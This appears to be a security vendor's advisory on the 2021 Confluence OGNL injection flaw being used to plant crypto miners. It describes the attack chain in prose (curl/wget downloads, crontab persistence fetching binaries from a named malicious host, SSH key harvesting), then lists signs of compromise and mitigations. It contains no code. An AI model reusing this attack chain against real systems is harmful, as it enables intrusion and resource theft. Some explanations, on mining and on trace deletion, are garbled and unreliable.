The Confluence vulnerability announced by Atlassian on 26 August 2021 has been exploited in recent days to gain access to systems running the affected Confluence versions.
In most cases, people who exploited the vulnerability did not steal data, but in some cases successfully attempted to use the machines (servers, vms, etc.) as crypto-mining bots for a crypto-mining botnet.
What is mining?
To simplify things, the process known as mining describes the creation of new transaction blocks between mining bots. Currency is thus exchanged in a bot-net and the "miner" receives newly created coins. These coins can then be used by the miner for personal gain when he uses the cryptocurrency to buy items over the internet, for example. This process is called crypto mining.
How does hacking work?
To give you a more accurate insight into the hacking process, we explain the procedure in a little more detail: Via an OGNL injection, malicious code can be injected into a Java-based web application or corporate environment. OGNL or Object-Graph Navigation Language is an open-source expression language for Java objects. In particular, OGNL enables the evaluation of expression languages in Apache Struts, a framework for developing Java web applications such as Jira or Confluence. The most critical vulnerabilities on the list of Apache Struts CVEs, relate to OGNL expression injection attacks that allow the evaluation of invalid expressions against the value stack. This allows an attacker to modify system variables or execute arbitrary code.
Code passed by a malicious person can then be executed remotely. The infiltrated script then downloads another script, which is transferred from another source via the -curl or wget command. Once downloaded, it executes itself and deletes all traces of the installation data. This ensures that its execution can be analysed and tracked by monitoring tools.
The installed code uses the crontab, a scheduled task feature that most operating systems come with, and manipulates the user's crontab to download binaries from, for example, bash.givemexyz.in or kdevtmpfsi every minute. After these binaries have been downloaded, the actual mining process begins.
In some cases, the system is searched for known hosts and ssh keys in order to infect further systems.
The miner then uses the entire resources of the system to obtain cryptocurrencies.
How to notice that your system has been accessed:
The most obvious sign is constant 100% utilisation of the system's CPU for an extended period of time. You will also find suspicious crontab entries in /var/spool/cron/crontabs/. In most cases, the Confluence application will stop, but there are a few Confluence processes that can run without the Java runtime environment. Usually the miner will create and use files in /tmp/. In most cases you will find kinsing files in your system.
How venITure helps you prevent abuse:
To prevent abuse, you can enable a content security policy to prevent cross-site scripting, clickjacking and other code injection attacks that result from running malicious content in the trusted web page context.
Implement http headers such as 'Strict-transport-Security', 'Content-Security-Policy', 'X-Frame-Options', 'X-Content-Tpe-Options', 'Referrer-Policy'and 'Permissions-Policy'. All of these headers enforce policies that make access to the respective resources much more difficult. This can prevent hackers from abusing your web application to gain access to your server.
A web application firewall (WAF) is a special form of application firewall that filters, monitors and blocks HTTP traffic to and from a web service. By inspecting HTTP traffic, it can prevent attacks that exploit known vulnerabilities in a web application, such as SQL injection, cross-site scripting (XSS), file inclusion, and improper system configuration.
Atlassian recommends updating Confluence to the latest and most secure version.
If you have further questions on the topic or need support in implementing prevention measures, please feel free to contact us.